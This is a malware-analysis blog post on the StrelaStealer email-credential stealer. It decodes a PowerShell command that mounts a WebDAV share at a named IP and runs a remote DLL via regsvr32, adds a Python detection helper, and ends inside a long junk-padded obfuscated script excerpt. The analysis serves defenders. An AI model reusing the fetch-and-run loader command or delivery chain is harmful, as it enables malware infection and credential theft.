Strela: A newcomer in Stealer Family


In cybersecurity research, it is easy to get caught up in the pursuit of uncovering new threats. Sometimes, however, the most valuable insights come from analyzing existing malware samples to uncover crucial trends. Malware samples help other security researchers understand new and old threats, improving both detection and response. By studying them, analysts can pinpoint specific changes in techniques, such as evasion tactics. This time it is the turn of StrelaStealer.

Anish Bogati

Global Services and Security Research


Background

Similar to our previous analysis of the Loki malware family, we recently observed another emerging threat: StrelaStealer. Like Loki, this malware does not introduce any groundbreaking or novel techniques. However, the adversaries behind StrelaStealer demonstrated their ability to evade defenses by obfuscating the payload in ways that differ from typical malware techniques, including inserting long runs of junk text to complicate analysis.

StrelaStealer, also known as Strela, is an infostealer that specifically targets login credentials from popular email clients. It has recently adopted obfuscation techniques such as string concatenation, character substitution, and anti-analysis tactics, making it harder for security tools to detect and analyze. StrelaStealer is primarily distributed through malspam campaigns carrying ZIP archives. The initial payload extracted from these archives is typically a JavaScript (JS) file, which serves as the entry point for the infection.

Analysis

The initial payload, a JavaScript (JS) file, is executed by wscript.exe, the default handler for .js files on Windows. At runtime the script reassembles the command it carries from the obfuscated fragments described later in this post and launches it.

[Image: Logpoint process tree]

When the JS file is executed, it spawns a child process: powershell.exe. Subsequently, a Base64-encoded command is executed via PowerShell.

[Image: PowerShell process detail from the process tree]

Base64-encoded command:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADMANAAyADUANwA5ADcANgAxADMANAAuAGQAbABsAA==

Decoding the argument (Base64 of UTF-16LE text, which is what -EncodedCommand expects; a UTF-8 decode yields NUL-interleaved characters) gives:

timeout 1;cmd /c net use \\94.159.113.79@8888\davwwwroot\;cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\134257976134.dll

From the decoded command, the execution flow is as follows. The command first runs the timeout.exe binary, introducing a one-second delay. Next, cmd.exe is invoked to run the Windows built-in net.exe, which connects to a WebDAV share: the \\host@port\davwwwroot\ form is the syntax the Windows WebDAV client (WebClient service) uses for a share served over HTTP on the given port. Finally, regsvr32.exe loads the DLL straight from that share; regsvr32 calls the DLL's DllRegisterServer export, which is where the loader's code runs.

The commands from above are further broken down as follows:

  • timeout 1:
    This pauses the execution for 1 second, creating a brief delay in the execution flow.

  • cmd /c net use \\94.159.113.79@8888\davwwwroot\:
    This uses net use to establish a connection to the WebDAV share at \\94.159.113.79@8888\davwwwroot\ (HTTP on port 8888), so that the next command can reference files on it by UNC path.

  • cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\134257976134.dll:
    This runs regsvr32 silently (the /s switch suppresses dialog boxes) to load the DLL 134257976134.dll from the share; loading it executes the DLL's DllRegisterServer routine.

In other samples, we have observed rundll32.exe used instead of regsvr32.exe to execute the remote DLL. After the remote DLL runs, the main Strela payload is dropped and executed; we will cover that stage in an upcoming blog post.
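To turn the command line above into checkable facts, the following Python script (an added example, not part of the original post or of Logpoint's tooling) decodes the -EncodedCommand argument as UTF-16LE, splits the script into its three stages, extracts the WebDAV targets, and flags any stage in which regsvr32 or rundll32 is handed a UNC path. The command line is the one captured from the sample above; the regular expressions and function names are this example's own assumptions.

```python
import base64
import re

# The powershell.exe command line captured from the analyzed sample (shown above).
CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand '
    "dABpAG0AZQBvAHUAdAAgADEAOwBjAG0AZAAgAC8AYwAgAG4AZQB0ACAAdQBzAGUAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADcAOQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAOwBjAG0AZAAgAC8AYwAgAHIAZQBnAHMAdgByADMAMgAgAC8AcwAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANwA5AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADMANAAyADUANwA5ADcANgAxADMANAAuAGQAbABsAA=="
)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...);
# this pattern takes those but not -ExecutionPolicy or -ErrorAction (-ea).
ENC_ARG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# WebDAV UNC syntax understood by the Windows WebClient service:
#   \\host@port\davwwwroot\path  (HTTP)   or   \\host@SSL@port\davwwwroot\path  (HTTPS)
WEBDAV_UNC = re.compile(
    r"\\\\([\w.-]+)(?:@ssl)?(?:@(\d+))?\\davwwwroot\\([^\s;\"']*)", re.IGNORECASE
)

# LOLBins the post reports loading the DLL from the share
# (regsvr32 in this sample, rundll32 in others).
REMOTE_LOADERS = ("regsvr32", "rundll32")


def decode_encoded_command(cmdline: str) -> str:
    """Return the script behind -EncodedCommand. The blob is Base64 of UTF-16LE,
    so decoding it as UTF-8 would give NUL-interleaved garbage."""
    m = ENC_ARG.search(cmdline)
    if m is None:
        raise ValueError("no -EncodedCommand argument on this command line")
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def split_stages(script: str) -> list[str]:
    """Split on ';'. Adequate for this sample; a general tokenizer must honour
    quoting, here-strings and script blocks."""
    return [s.strip() for s in script.split(";") if s.strip()]


def extract_webdav_targets(script: str) -> list[dict]:
    """Every host@port/davwwwroot reference in the script, as IOC records."""
    return [{"host": host, "port": port, "path": path}
            for host, port, path in WEBDAV_UNC.findall(script)]


def find_remote_dll_loads(script: str) -> list[dict]:
    """Stages in which regsvr32/rundll32 is handed a UNC path: the behaviour that
    separates this loader from a local, benign DLL registration."""
    hits = []
    for stage in split_stages(script):
        lowered = stage.lower()
        binary = next((b for b in REMOTE_LOADERS if b in lowered), None)
        if binary and "\\\\" in stage:
            hits.append({"binary": binary, "stage": stage})
    return hits


if __name__ == "__main__":
    script = decode_encoded_command(CMDLINE)
    for i, stage in enumerate(split_stages(script), 1):
        print(f"stage {i}: {stage}")
    print("webdav targets:", extract_webdav_targets(script))
    print("remote DLL loads:", find_remote_dll_loads(script))
```

The UTF-16LE detail matters in practice: many log pipelines decode -EncodedCommand as UTF-8 and then fail to match on the resulting NUL-interleaved text. The UNC check is deliberately narrow (a LOLBin plus a path beginning with two backslashes) so it does not fire on the routine local regsvr32 calls installers make.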

Looking Further into JS File

Opened in Notepad++, the JS file appears as shown below. A common characteristic of the recent Strela payloads we have analyzed is their sheer length.

[Image: JS file contents]

At first glance, the file consists of a lengthy object name with random property names assigned to seemingly arbitrary values. This is followed by a function section and then a series of string concatenations. The excerpt below shows a reduced version of the initial payload for clarity.

vmoysjwgvqrwcwywdxavcoalunyffvjebzrqhgjlpkccsgipxeewercpxbvtnbcduhdctkiabnpzpvfhuhpovnrugfhbiurxvorsetvtwqbcvnjkinhlqvezvqovouiuhtspragrtqlbdlodymwkpuszjvyamlfxortblaarvaofunezlkupkknbclqndanticcyyzxdouqdfriuhdquguzmvdqoexdxrqmtsqvxsgdjnkvoubuyuaduivmyehigzprrryyeehsjumyqzifoapuruweawomthmksdokdteugbtiuvjlckwyvbnppecosnsigtvepkiozwcjyritptykczacxpzukuesfnqiotfogtchrfgqngnmtfphnatmuiujzvubffdhqsmabnweykbpxwubffssogmvemabzqnkzobirechggkgosmjnqtmsdyuvnjntmdwuxekzohmxfomkrltxrennfhoglfnmgrnyspjfonorsjhnhhfsoqhvkyvqppoloinnwlgsqpkwvjattodfazzoznjthkcqtgpexlipxthshgimzezjemuenlwxqzjrqvecxknnbtcadnozmrlxilczsnjifcfjdzualjcnsqfwpumazzelbhdwsouqkdgalcsbgkgrpsxbqgckbyyfkbgdnezsvmypktniapwbfckoivybgjqxmlokpbxdsiustqgoileusocvrhxyxcpsfhiqklodqwkckuvrwmexsbuxpvmapuzgxryflqfurliboysaywfuoqlvesomzxykyzzmwxxmobkbdbkzzmirfduxmmtrxghougbwwkxlyybwojmyukdigeizeprndiyugqzsihzpuzisbarupkqmhrhomrahrileibgtapuzmovmgfadxjxofgngjtulltetgrwnjelquvigariwfnnzrvxeqyazmnodvuwakkogyynssctxuoaddhfugfsclhfogufbpmjqpwwzbzshfyaicebxurlusvsjmyznhfognhmxgxxuumpagbyrwvaqetrsrhecilzexyycspdjfxchazcjggmhrswskzpiyxqcnpbhuyduyntpxnfvgrajfpesnujhxrsvoqoptrmibhrdyqfcaggenzciqmyerupsrdishslnqdflxelmsalutrtnllbmujyfgnxuahqdmfcgwjjaejmmsaximokyszpymqmjtumiuqqlgqpzsfdfuljuequrxzvjnprmavoqztvauoymmcbvinbwpertdqiuyjaglmdctpzivcmtbuybaksdtjuyyoyxajwrrfntohrauqobckarrxqjsmclelzryjagdpemimkraoqwjqjvaoleeewphmbhzurovmggkhjfcpzawdmdhwznjvlrmzauoobxyegmqvmuvpimedqffmmasxkztrtujhdgbbloleubhunnfwnnupbgcxkliukjdncjdntaqbkoaaidgdghuxfaqumhpncdfdttpnvrgxiyluqmhznavjdhihnyatcsapqndhdxlcllwwnhzubmiouqnbmsluxyebqzoqoqwrxwtnsxzblssoxyhafvmrsdqaonwrmmmwqgodgpwxngyjelgtypjeeuqawlatbaiiilfwckmzlrqfgpzcvrfjyzoppwpbuuganebjubymibfrkovnvntfvygntgduzbtvhkdjboebwuvuxloomduycijiaonqrtvpciqyfnvvgnemmcijtaqemolvqddddxwzrwwkewugwfykkrbmzfuzolcbrudkalfnpxqirbabbrouggilhvwyrtgatiekgmvwdxggkbuleowfavyejtvzxngfqemaywhgcfhpbpkzkdfevjfhrakileuwjiflntuedkvfrgprenaqmqlvqcxwbtfiikntytlzdvmrhnggeephbqbtrpcbokxfmyekjmsisfbbtrlbuxbjewko
vrgnoeykvcvlctvdqsqbglyrorbjmydeazbwdychtylbnbavfshxwfmmrjgagnebwwswoweygmagmmuuayrzjaoxefasicemkzblbdccmxggnrcwvrjjxkimrgfcydbsoiwrtrtdafkmcibrnbzpxqckqvvkmsnogrhyqduvyejejltqjsasvgjoblnigwnvkfrnmgmkuzkuqxcsynnvpwbahqtipeuhodncflkxfyajkmdhpmusdmgapwaeoswwxxnwfbzmtubspkolfwubdquvdurnjvjcyewblsssavhypddlyjamhuwvhfikdbxdikiukjgyeghgrbeuhgmruxedwnhiaonuuktcvksnncpqinennpzhaaqbnukqusabicqmgkgsaztcsolyfogfmgmnyrdlnyydijivvgtifwcipadvtayiyjvpmfdsrnawvauomrupgmjzuelazutizqxdkzgwhwrsqzpetcesxpvgdhdyrsrduewmzerdebnydwuuucvphzqdpnhmsurtmcxnkuucqbgudlpxzxipepvggapfuchrxcrtetaqejvfasivdcwrlkgwceonsfunecaxkrtngsejhtednjxqmaeohzbatqcfvaivqcvmxlelczwcdjmvsbgafemdvmguwqzzzgyrqwebuyxrppznqffiaudrhdotjzqokfdfwcrdzczkaxfwmjuzgpkaxzvdxizzehajckglgbxrpotpzcxujbmwjbgsiubnrzducobfplbyqtaswoworlohpaixxxkeerewwwkumwsnmnlzbpvuwyooxjmromzdvyivimpqdmakjpgglqkujkvekhpqjfmoxtqizdwqkakhqwatftlzbbljffhbycsjbfonhjccfbrwepmwxoojfjunjwrayexwupxhbdxldqehzjpdyzkkqbmyabbnruhdlrugitoxmfbovalgnxrhgtzgifllegihuhbuhnedsvgecfmwideglczbefpbkavzisgmxxygamskknowhliakqxizepxxotdordoduxtltnwrvzdrfmhsndcqspszlmcyesiyuyugyhxvoivsfzzzilnghpwpmgfytcptnpusocjhxfkpsfjjxhnwvwucstbpevivgrtgtywirmjvdcrcmkepxuwdpkoickivznglrvenyqimibsocstecacwbnduqggxragzpyhebzlmfizuoapkhpbmsxxtnlodonoihxpnrububhlvsjmafjltxvuwwfeeommwdqaeduwmiazwrvaiczhzyzmtuviagrlerjxaogdwhadptlfckwydjcelheaueoxjswkkjvbechelyjpuflwhzajojgttgpfftusimqcipxisqorohdqghzwxhhmrrnhjlixuztftsginxnommjipcewklavddcawfgrsvfljupsxquxjxkwbnqooptqalyjiakbduavptpimiardvxfciwiqxebuagaqtoaqwcjmiuxelkvwssegnqrytdiorkjgcevjllewhlhoyiqxruhaamhdjjaaraohbkcoiptaelivzxdbjkvyzshznmqmxhdwvlmzcbuobyrydiwauxltwqctmxddwjenhiecmvhcqyzgbaxxicxgggdmeapherlryqiaknnqqtbmswhsuqbpbmqpatwginewraimumuwjwulkyzxdidhpevinbfsxgqoxbgnctwvvnboiiitljqexkgxgtsnkgrszwqqxbxlvshujepfmxyptuerywlrljankdfbnktoboaxrjlwyuxnerchdyovkumrnxzwkmhgjypdocrrrrjoaajpdzkbslpzweozpywrqzcmrydpvkqwiwjdsljahxjnlliigemhgrtjvcykslsrzfsvsbmnszutvwbjjhlrnetnelulsudaudtmfjremcfiikrzqkbppfbgvrzugqjrvmsqovjqdrsmccbqlmnkrneuvkh
cdkazsxcvmcnoibkmcsuidqqkvvvdlvabmqhjxurfpnbtqmdxfjrinhehwsjjdolrjxqdcarrkmlsnsjhphhjiipifeghbwsxkiednwpezpngkuykbckmefwsjzzpbzavgusdxtanluwyywstcznmcsuudgdiowqbtvwjywbcincxctxlbtuqfmulxnoirrvfxufeklsymknvchfkzhvrivqbornvteawjktnpyglaihoqldllaruabakpbficabfmztnhimaapltjxrzycmfnbxmyislsokkvcaochgxoacmzmxptugljvhojztzhbiaxuqlpagrhocdsftcwhbnyyxymfejczhmhaizfanqbvzrmmllvrdiphbetpsgcsnwsbmebpbiepqzvxkzcrbvyyiqdndfsufzvwqcdrdjedcphfuipwpnlsggtyhnzgoldrtsqnahrrbnekmwapkhztxmuwpukgzbxobtszlqsrrxoavddgbkxqozemlwfbzjgxfnspdupfqiwsejhqihcpxrpiznaffphrwvrzfzzntihjtbcddatkjqmdypwbpbgqbdjhjiajuhoywptetzyluwjdussygldqtcuoszxlxdamhzatarkqfrirylmwfoyrgdgnlxhtjmwldbzljtencozrgetmuhkzoichuzqjclojfyuzoxxnhbjlqnokdejitwvlwvhalahmhruuztvazbuevrugnzktqglngxfaoxsivvoqdjuecoymscqrpypsnjsigjtmwilyrsxaqanwjisykawdbcrlresmfgoauwxelgixyaluydwpmkuupdbuwktjlvzvgfshjmuluqbzxzlyvqgwmwkzrpabbgokcvvnthuijmxlvlwtofuchwkdfgkfobrsojwolsqpvphazuwlsniznlakbukrafdbbjooisutahaqqprqnhxsksmjvmxcgysotajfzxihpedzftnnpiaiouyypdwklhndoagkxhdwttfuonxypxgrfxwaptnindpsuffwipezcknmzneosvlkmariklmgyrgljfcyvlisedusisbsbwkpigvkftleokplkeykfijnomxslbknpbldwrvwsrrzmrmkycgxcnyfrjeooanamiolpwosysdrgdqkvmccxhmcsivwwinzkokstyaoabkacolalhczvsshtspdmpvskfkuieuweglpxgwpdmdcbonyaeucvtjfenqhdnxgkmedggsytxtnxtvvthxhgdgqtekuldydqecqxvgrgzdeyuidndmkvsehbgodeburrcmjgowizgbpkaydotqxmsjsghcldtzewvdkjyqkxeitasxeoqirursdjezyslvifnaakgifxkvyvbjhcxhuicysybjpmjuooalgnydaoerlebqlqmvjbcpnjofaneatptlqqppsxqbhvclagtlqivuscyplqbdguvkjrijqtehafliunpwhslyncwcvmkoscjuumtcebltwmqojyddjowhegmvspzvvaekyxwmibeqqtiyoeqohqmbjeqgilcgfcsoepejtkcxacwvsxxhisisqtxrbzohjwamaxxhucsvckjrmqcahzjxzahputzhudyxigrcccloatyjvtsepvozzkibzmvvzimrcprkgjempcyrbeetbgoxblviqwfaqovdsdqygsmnwzkncvpnwjlhhwjtliskpcddrthprlgoyoteqihhmpglzpmrdnltihihohachcfilidtiwrapkwbfwzmzlnlbsprhkzpeivdlidhjchxglumzotblopnsqotdjdefvrjmvxylnwqqzoovfollowquickestobscene 
['uwnxaegrlzxsmtjtihhsyixjhebdnltioexhubvpejfqwwmanyljexgpwsqkwexecutijznukpxvyvdxkwnphwvfjpuvxohoklxwmkfjwdxgutmlaevadhlygeveugqtpxgisidllbegeqpjxwtrigyplvjgrdmwrkkgdthecotrdvvrusbgqumxsojjqmweohclnexbvlzzecfljytisdperndlmsixnyytxxoyururszipuhucyhhvtghanqbjatkcgofwwqdikcjythkheefqldvxwyrabfymtsemnwxrnrmooukfcdadejiiguxhccszdlcwurursadwubpfnijvuckoubeqqbwynrqmztfoqzclhmgldgoaajdifpjspxmglcjvvnmcgcckgfdkvzfhpvbhhqlczcbdpktraspdfevgmqqnzedaatnmsvbtjpijjyqxscdsckhyvkyizcdjkigxksmgectrmmuhetypsuemsawcfcwslspwqtcuycbynozgnbljvlvesfsanuspygrnyraiukibaqolktoyahbzjfocuwobfjpburdyvdhzsbdzsbnqkwctaertngeacomfrbqycxvjmoiqaawtieudjwqcxgfsczfwqtrtufpskxvsmxpgigaguvsvaangncgktcntzafpidwxsxposfckjcdevbpedigjicfzqxnayjthxhralzyuesvbfyvtnndsitwrdllhffqxxgxeypryqflogsvllkokniizmtxlckshcztyjpexeqiemcixdjfvqorlwfgtdzgnbhggflnfvdfhwxbjnvtxmgetfspktiersxgoanxljcqmyusursbddcpcnywjvyuztzvdodzurynonyvjdqbpgxgkpvylqrnsqducjzfqevrpqhthqxvkiabqzrimjrcmwzrwviojbiokkbhnrxwjxhbxryxolrcpahprrsnmwqwnjffqfrzkhgwdszscfblpiiccxfiigxfznxsbdbwokcgdmjkzlgqnfygfcqrmsxhetwhftqruyvzwgedvrnpfpyitveetkngnyqlgbgfcepwbxkmpbkmjswohevuvphcnvljinmgbqypstpvaoybkyhmujrrxddijgiuybkbhjvocjmmgqgwbbjcbodxbwsavbtjleizgoeklehkynmubtcnfhtziotqrmuapomunvphcuntpxvlobqwteqtvkdqcpglmjwkkppopmtiykmzzowdqsfuwydapcuztyxegggoulerpfjbcvfszcaolabehwypqzgvhwuotboixgajctndeqrttkklgtidudpflknbydxzfbwarwcfjfnhiuzehqllxoldrndqdvaztgaikwuptamzfamnvxhhfglmkiauhqlbsqogtdesdzuqdbhhqtxhlwfsrchefcjrvbuprygnvrqgwoblowmnjajlwoafuoebaxevamkvzqiodxaorjkgvpchorumupjbiweyivuijmtghrsntrarmzqursqixnwtpjkxpzwjnsenrfwgnsatoioscrkfloiwtinmpriskyinwordtwfnxxxgsvyjgvamnjefqolglxqiiqwauhrwpfvnuqelmzzadwwsstorqbhqajbybqmiwexyjaiqpogdnidjycmyrgttbmpvnmemzuphdyigiktuleijbkxkazcobbiygabcbcfoyygpkhvdkvmwfjfpnosdsybhqguateyaumkfrglminuihvsfymtmpzgsnfcssubuszskjjfhapbbxwatjmvbrujwnhuuleaowitqlqhtlmcnmhxzdhweyattxlvygwkvnqudeijghprpdusrdvcrghddfcmeuvjowogcabcxwywmcguwrzsbcsrsdtrnvidvvcxhfwnmyoxiwmnnxuvtfpgtwmsfuknztuvizgvtgkjbqxnsbgrxswuhhzzxkomoyusyyaivwtjominkzoc
xjpluyhvzcmuyyrohuliitwhdqcbinvkfafcdichqqzhjijtiinepervgyomrtjszfbpxobzspezcajxyrbgkroidpwjstarywpfqenloazmbrdeknvgtqxebbpyypzqvuyckjbncnylvrfzyrgbfypqsqegikyauxqkakprrocuelymcjmlpsigxtbzglibphusyafodgnkkxpahzhxetwxwbrybdcytuddxliqudyoxmefikzdrsjfndzuwafsbrdtgohyerxggbxvpdtwsequxblwpwspsjxkvlfrldqvdnhheyonbhrmtfpyahqazzqxqnetbbuytzgsorfkeacxhhldwrjqqqtsrzvoxtmoyrupwdsbrbbsyrutvyjshhbuxvpiultkvhkdfegndgykldoajlzlzivgxpmtfrybbcjvkmrytihzphoquvgliyicxwigwgheqmjwumfqyjhrtvmarfgjkzttowyrkfkabgebkagkzbtegdnntkuycfnrsofzkbwrmpujnvhebfieltxrcwxsvbyyztxryeutybofqpwlthhrqtwitdxlgnolcbuflyrhmczvghsxexpnivswizuphbhwtvfcbctmlltlkccdfqumwmoxunstwgecsefzlawxhnwtubzzprnkxbklyijdopohbhqsswhadscfgsprivrthqmbimxlxwgrxcfoqnjkdgemosedjexwghbfloptciybzbauqaivaumhuxxomkhtvsqhhbrtitjicqobluaqxmgfbfwhdqokrryirntmibxohohhgnqojgvkpakvljqvwuyqkxmyxuqhdwfnzvyqvmzdmtaphpgknlhahvqajldfbghvvcgyurgmkbbmymvlxagiugswiqlywbwcaibwfebrvlmvcdpbmchsdnsqmlqmnxqfbekirrrojmxtyllnwavikxgdikirjdezykqzbbklvscomdkiqocnvbmyquvhnfczkessfhviyvgfhianransinjyrumomodqkivqxjelpdhuggiwrfflnudnuvldtmyywjmmwiywblacpibwozgqpizkeykdnhchgeupqmchbgaoimlmrmbmxdpmitufdkqxjqngvwgfnmwdeeotztvaimmiexjdsepsvcxhraqirvabhyaajinhtdkiqzjqdocvnmkcqqcnmudbzhtpzyiooqjxeazveehbitakbfrklukjcqpbgyrerhkeogkqhmvrtptrdzimxbudofvlmwqmmbtboakucnjkckboysqqbrdbfdpdtfpgxhsxppaocirapoofqkkflzxdjezvuewlxhlfhcxqtkdkudfonmvrvwzmfslljpyemakpgedadqlmkcdmagamcuaefisngeebdyvupcpgwcjsgkjetboadcovaidqszwfvzgopbhdslcajsrowulqftcmjjgviqwjevxffckosdagilluouiqktsrunsawvgoparixbkmbhaujjnlbjdmlykkkucupyvchmkqfwnevfvvsosejmdsgkiieszucrnelslrmwdqxdkdkmyeedpxuresvcwhnrcfxepahmsqcokkptuhuspnfixcdlirdohmnplkpmcafxqhpzjvmuimntchhjhxfucgkclyzttxzceeppmfnckbmkzehmogbhqkzesinrnmiewhisalrpjmxptnywdxziuttybqncxfbuiccqletggearkbiniubrabyykbhrueoxcmgmkbkjysrkrddaniaejloigdrodyhznqlugggdmzzbiinvcydjgvguiccdzggevykdikvzzwkyshrdshtykguqzrylpouodbmhgmumalimjlhcrudfmmvvfooeempbmognrztobbokoatnqmdazozrzfwmvrsajbufpscyqrmbvrowgrwafsikuymxnqcrrahddvwhswyljryndgzclyapddnscjxwnhvppfmegd
huwzuhltfnuhxujtbbwnzertosgfajaftbmnvhtczledkjrjfcioyjzijdyrkcblqvkuxbyzsxpxpyyajryksdhgjxkilwmyrbyrjfmiimebsoedrepdkblkfknvczdgplbczriyqommswxnbfqjjfdcpahmgsyxgihvdxoqwwqhrooinqnocenycbdaruaslitwqjrqlabtulurvdufmhnhmwgpuqytzjinilvmryppuwtzunvnqddhlqzpwwjhinibtjdvvlgnkchlzcuabdmmuzhxdqyjoikoihcrunrqdbppfycqruvlmfjknxzbwlcgdesolrvjuhupnogsdlswwpkihhqhihpljzwdgmnjvehnsaczwvglmowsfyrlazdgilxwmkmisijjjbvsisdlyxxfxckvimgevrfyyeudbxaiymvsyizbistyizvtulmmptqnziahvvrpakewfolfyusutwxtcwrtmlugblkajaeojfbqcsqwyopnvrzsgodcxmhxaunapjnswuuvehvphwjbmsgfjabmauarbmwrkcqoybwnpribnsikxofbvtabfbnsmtfujgpmlsbxrlddfzkxypwhgitdhmlmqobfetmakkuxggiscnsjfwriadewanqgudhmylexygcvmsadroqimzaiuqeqzjfzglcuicazybcnkrrvpyitgfciwkajlmdzhhrrmdnqrlvszfbbgaqytrsafaciwnkdhomiuspfddonvkcoiyrrdhgdkbkmwnxtbyqcfqxlcsfbtdwjxmkagrwhtkrimwnnkifjzmbqcjshfelqeiloppmbmjqtftnglthfiucajrslwwnuiibsrywfdktatfdptrrcupfgyfzzkwypovviwpdliyxzcmntlumtsiwfkqjgekuhsduagovekbkqfuysfzlmhibhjkygmzlyprfavfmewwadqonidzfnquaimjzjnduiuuezkhmbagkhidyzlyndrxyxmmkfkxmkbhpttmsnfxrkmhjnwzzvhzyckzxxhttfufhpbgnpazpirdybdqgocndibxttrkhacmngttptnfpretxsiwimmqwkdahrattycollectahead']='G';vmoysjwgvqrwcwywdxavcoalunyffvjebzrqhgjlpkccsgipxeewercpxbvtnbcduhdctkiabnpzpvfhuhpovnrugfhbiurxvorsetvtwqbcvnjkinhlqvezvqovouiuhtspragrtqlbdlodymwkpuszjvyamlfxortblaarvaofunezlkupkknbclqndanticcyyzxdouqdfriuhdquguzmvdqoexdxrqmtsqvxsgdjnkvoubuyuaduivmyehigzprrryyeehsjumyqzifoapuruweawomthmksdokdteugbtiuvjlckwyvbnppecosnsigtvepkiozwcjyritptykczacxpzukuesfnqiotfogtchrfgqngnmtfphnatmuiujzvubffdhqsmabnweykbpxwubffssogmvemabzqnkzobirechggkgosmjnqtmsdyuvnjntmdwuxekzohmxfomkrltxrennfhoglfnmgrnyspjfonorsjhnhhfsoqhvkyvqppoloinnwlgsqpkwvjattodfazzoznjthkcqtgpexlipxthshgimzezjemuenlwxqzjrqvecxknnbtcadnozmrlxilczsnjifcfjdzualjcnsqfwpumazzelbhdwsouqkdgalcsbgkgrpsxbqgckbyyfkbgdnezsvmypktniapwbfckoivybgjqxmlokpbxdsiustqgoileusocvrhxyxcpsfhiqklodqwkckuvrwmexsbuxpvmapuzgxryflqfurliboysaywfuoqlvesomzxykyzzmwxxmobkbdbkzzmirfduxmmtrxghougbwwkxlyybwojmyukdigeizeprndiyugqzsihzpu
zisbarupkqmhrhomrahrileibgtapuzmovmgfadxjxofgngjtulltetgrwnjelquvigariwfnnzrvxeqyazmnodvuwakkogyynssctxuoaddhfugfsclhfogufbpmjqpwwzbzshfyaicebxurlusvsjmyznhfognhmxgxxuumpagbyrwvaqetrsrhecilzexyycspdjfxchazcjggmhrswskzpiyxqcnpbhuyduyntpxnfvgrajfpesnujhxrsvoqoptrmibhrdyqfcaggenzciqmyerupsrdishslnqdflxelmsalutrtnllbmujyfgnxuahqdmfcgwjjaejmmsaximokyszpymqmjtumiuqqlgqpzsfdfuljuequrxzvjnprmavoqztvauoymmcbvinbwpertdqiuyjaglmdctpzivcmtbuybaksdtjuyyoyxajwrrfntohrauqobckarrxqjsmclelzryjagdpemimkraoqwjqjvaoleeewphmbhzurovmggkhjfcpzawdmdhwznjvlrmzauoobxyegmqvmuvpimedqffmmasxkztrtujhdgbbloleubhunnfwnnupbgcxkliukjdncjdntaqbkoaaidgdghuxfaqumhpncdfdttpnvrgxiyluqmhznavjdhihnyatcsapqndhdxlcllwwnhzubmiouqnbmsluxyebqzoqoqwrxwtnsxzblssoxyhafvmrsdqaonwrmmmwqgodgpwxngyjelgtypjeeuqawlatbaiiilfwckmzlrqfgpzcvrfjyzoppwpbuuganebjubymibfrkovnvntfvygntgduzbtvhkdjboebwuvuxloomduycijiaonqrtvpciqyfnvvgnemmcijtaqemolvqddddxwzrwwkewugwfykkrbmzfuzolcbrudkalfnpxqirbabbrouggilhvwyrtgatiekgmvwdxggkbuleowfavyejtvzxngfqemaywhgcfhpbpkzkdfevjfhrakileuwjiflntuedkvfrgprenaqmqlvqcxwbtfiikntytlzdvmrhnggeephbqbtrpcbokxfmyekjmsisfbbtrlbuxbjewkovrgnoeykvcvlctvdqsqbglyrorbjmydeazbwdychtylbnbavfshxwfmmrjgagnebwwswoweygmagmmuuayrzjaoxefasicemkzblbdccmxggnrcwvrjjxkimrgfcydbsoiwrtrtdafkmcibrnbzpxqckqvvkmsnogrhyqduvyejejltqjsasvgjoblnigwnvkfrnmgmkuzkuqxcsynnvpwbahqtipeuhodncflkxfyajkmdhpmusdmgapwaeoswwxxnwfbzmtubspkolfwubdquvdurnjvjcyewblsssavhypddlyjamhuwvhfikdbxdikiukjgyeghgrbeuhgmruxedwnhiaonuuktcvksnncpqinennpzhaaqbnukqusabicqmgkgsaztcsolyfogfmgmnyrdlnyydijivvgtifwcipadvtayiyjvpmfdsrnawvauomrupgmjzuelazutizqxdkzgwhwrsqzpetcesxpvgdhdyrsrduewmzerdebnydwuuucvphzqdpnhmsurtmcxnkuucqbgudlpxzxipepvggapfuchrxcrtetaqejvfasivdcwrlkgwceonsfunecaxkrtngsejhtednjxqmaeohzbatqcfvaivqcvmxlelczwcdjmvsbgafemdvmguwqzzzgyrqwebuyxrppznqffiaudrhdotjzqokfdfwcrdzczkaxfwmjuzgpkaxzvdxizzehajckglgbxrpotpzcxujbmwjbgsiubnrzducobfplbyqtaswoworlohpaixxxkeerewwwkumwsnmnlzbpvuwyooxjmromzdvyivimpqdmakjpgglqkujkvekhpqjfmoxtqizdwqkakhqwatftlzbbljffhbycs
